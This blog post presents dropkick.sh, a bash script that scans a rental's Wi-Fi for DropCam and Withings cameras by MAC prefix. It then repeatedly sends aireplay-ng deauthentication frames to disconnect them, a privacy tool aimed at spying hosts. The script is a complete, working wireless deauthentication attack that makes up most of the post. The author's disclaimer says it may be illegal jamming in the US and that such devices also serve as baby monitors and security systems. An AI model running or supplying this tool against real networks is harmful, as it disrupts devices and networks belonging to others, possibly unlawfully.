Detect & Disable Wi-Fi cameras in that hotel room you’re staying in.
0
0
There have been a few too many stories lately of AirBnB hosts caught spying on their guests with WiFi cameras, using DropCam cameras in particular. Here’s a quick script that will detect two popular brands of WiFi cameras during your stay and disconnect them in turn. It’s based on glasshole.sh. It should do away with the need to rummage around in other people’s stuff, racked with paranoia, looking for the things.
Thanks to Adam Harvey for giving me the push, not to mention for naming it.
For a plug-and-play solution in the form of a network appliance, see Cyborg Unplug.
#!/bin/bash
#
# DROPKICK.SH
#
# Detect and Disconnect the DropCam and Withings devices some people are using to
# spy on guests in their home, especially in AirBnB rentals. Based on Glasshole.sh:
#
# http://julianoliver.com/output/log_2014-05-30_20-52
#
# This script was named by Adam Harvey (http://ahprojects.com), who also
# encouraged me to write it. It requires a GNU/Linux host (laptop, Raspberry Pi,
# etc) and the aircrack-ng suite. I put 'beep' in there for a little audio
# notification. Comment it out if you don't need it.
#
# See also http://plugunplug.net, for a plug-and-play device that does this
# based on OpenWrt. Code here:
#
# https://github.com/JulianOliver/CyborgUnplug
#
# Save as dropkick.sh, 'chmod +x dropkick.sh' and exec as follows:
#
# sudo ./dropkick.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
shopt -s nocasematch # Set shell to ignore case
shopt -s extglob # For non-interactive shell.
readonly NIC=$1 # Your wireless NIC
readonly BSSID=$2 # Network BSSID (AirBnB WiFi network)
readonly MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
# MAC=$(ip link show "$NIC" | awk '/ether/ {print $2}') # If 'ifconfig' not
# present.
readonly GGMAC='@(30:8C:FB*|00:24:E4*)' # Match against DropCam and Withings
readonly POLL=30 # Check every 30 seconds
readonly LOG=/var/log/dropkick.log
airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device
while true;
do
for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
'([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
do
if [[ "$TARGET" == "$GGMAC" ]]
then
# Audio alert
beep -f 1000 -l 500 -n 200 -r 2
echo "WiFi camera discovered: "$TARGET >> $LOG
aireplay-ng -0 1 -a $BSSID -c $TARGET mon0
echo "De-authed: "$TARGET " from network: " $BSSID >> $LOG
echo '
__ __ _ __ __
___/ /______ ___ / /__ (_)___/ /_____ ___/ /
/ _ / __/ _ \/ _ \/ _// / __/ _/ -_) _ /
\_,_/_/ \___/ .__/_/\_\/_/\__/_/\_\\__/\_,_/
/_/
'
else
echo $TARGET": is not a DropCam or Withings device. Leaving alone.."
fi
done
echo "None found this round."
sleep $POLL
done
airmon-ng stop mon0
Disclaimer
For the record, I’m well aware DropCam and Withings are also sold as baby monitors and home security products. The very fact this code exists should challenge you to reconsider the non-sane choice to rely on anything wireless for home security. More so, WiFi jammers – while illegal – are cheap. If you care, use cable.
It may be illegal to use this script in the US. Due to changes in FCC regulation in 2015, it appears intentionally de-authing WiFi clients, even in your own home, is now classed as ‘jamming’. Up until recently, jamming was defined as the indiscriminate addition of noise to signal – still the global technical definition. It’s worth noting here that all wireless routers necessarily ship with the ability to de-auth, as part of the 802.11 specification.
All said, use of this script is at your own risk. Use with caution.
Link to Original Article
